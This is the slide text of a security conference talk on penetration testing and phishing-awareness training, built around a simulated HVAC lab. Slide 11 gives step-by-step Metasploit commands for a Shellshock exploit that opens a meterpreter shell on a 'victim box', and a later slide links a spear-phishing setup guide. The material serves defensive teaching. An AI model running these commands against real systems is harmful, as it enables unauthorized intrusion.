1. ANATOMY OF A PENTEST:
PROACTIVE STEPS TO ADDRESS
VULNERABILITIES IN YOUR NETWORK
Presenter: Robbie Corley
Robbie.Corley@KCTCS.EDU
Organization: KCTCS
Senior Information Security Analyst
2. Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
• Reverse Engineering / Studying Shellcode
• Finding and Exploiting Software Vulnerabilties
ABOUT ME
3. What is a pentest?
• A pentest is a simulated attack against a system to
prove or disprove the existence of vulnerabilities
previously detected by a vulnerability scan.
How does it work?
• You are the attacker:
• You will use exploits custom tailored to target
specific flagged vulnerabilities from your
previous vulnerability scan
LET’S TALK ABOUT PENTESTING
4. Some history on Pentesting…
• Pentesting originally required manually compiling each individual exploit
to test a vulnerability, all of which were usually coded in different
programming languages and specific to OS builds (XP sp1, XP sp2, etc)
What’s the advantage over a Vulnerability Scan and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your
network risk assessment
• A Pentest helps you fortify your network by discovering and
patching security holes before the attackers do and keeps your
auditors happy, which also keeps your boss happy
• Pentesting “weeds out” false positives from a Vulnerability Scan
while also validating vulnerabilities
LET’S TALK ABOUT PENTESTING
5. • Our Goal: To Scan and Validate vulnerabilities in a simulated environment to
demonstrate the effectiveness of a Pentest
• Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus)
• Other recommendations: Tenable Nessus
• Open Source: OpenVAS
• Why Rapid7?
• Exploits are pre-compiled and you do not need to go online to search for them.
Readily available, built into the software
• Scanner and Pentesting software both free to try
• Software Resources Used:
• Nexpose Vulnerability Scan Solution
• Metasploit Pentesting Solution
CONDUCTING YOUR FIRST PENTEST
6. • Breakdown: Your boss has requested a blind vulnerability/pentest
assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
• A blind scan/pentest is when you scan/pentest a network without using
known credentials. This helps to mimic a realistic cyber attack scenario
•HVAC Network Layout:
• HVAC A: Windows XP for server HVAC software:
• 192.168.56.101
• HVAC B: Linux Web Server for HVAC Web Services
• 192.168.56.102
HVAC SYSTEM SCAN & PENTEST
SIMULATION
7. HVAC SERVER A: SCAN SIMULATION
Vulnerability Scan Results using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
8. HVAC SERVER A: PENTEST SIMULATION
Pentest Live Demo using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
9. HVAC SERVER B: SCAN SIMULATION
Vulnerability Scan Results using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
Shellshock!!!!!!
10. HVAC SERVER B: PENTEST SIMULATION
Pentest Live Demo using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
11. PENTEST SHELL COMMANDS USED
Commands used for future reference:
To pull up web console, type : Alt +Tilde “~”, then…
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec”
• “set RHOST 192.168.56.102” (our victim box ip address)
• “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module)
• “run”
Once in the compromised victim’s machine session, you can open a
shell by simply typing “shell”. You will then be greeted with a linux shell
12. • Why have User Awareness Training?
• Users can be more mindful of simple operations that can effectively
help keep their documents and data safe
• We simply cannot monitor all of our users’ actions
• Hacker’s are keen on well structured network security, and seek out
easier pathways of entry, i.e.: A phishing email directed to an
unsuspecting, un-training user
• On a personal note: Training gives our users a boost of confidence,
knowing they are collectively making a difference in keeping themselves
and the company more secure
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING MODULES
13. • How does it work?
• Phishing Modules use pre-made email templates
that resemble common Phishing emails in the wild
• Emails can be tailored to re-direct users to
informative phishing awareness videos upon the
user interacting with a phishing email
• What tools do I need?
• Easiest solution and what we will be using:
SPTOOLKIT
• SPTOOLKIT is Opensource and requires little
effort to setup
• Rapid7’s Metasploit Pentesting Software also
includes a Social Engineering module with a pro
license
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING PHISHING MODULES
14. • Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
• SMTP server
• Any Linux OS box with Apache and
MySQL installed
• Recommended approach: Install
Kali Linux which has Apache and
MySql installed and enabled by
default
• http://www.kali.org/downloads/
• Commands to start MYSQL and Apache:
• Service apache2 start
• Service mysql start
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
16. THAT’S ALL FOLKS
This presentation and its supplemental video and software content
can be downloaded by using the following link:
http://tinyurl.com/l46flvo (Secure Google-Drive repository)
Links to Resources outside of this repository:
SPTOOLKIT Setup Guide:
http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
www.rapid7.com -> download Community edition of Metasploit and Nexpose
http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting
environment and for SPTOOLKIT Social Engineering Module
Want to chat with me outside of this conference about more IT Security topics?
Shoot me an email at:
Robbie.Corley@kctcs.edu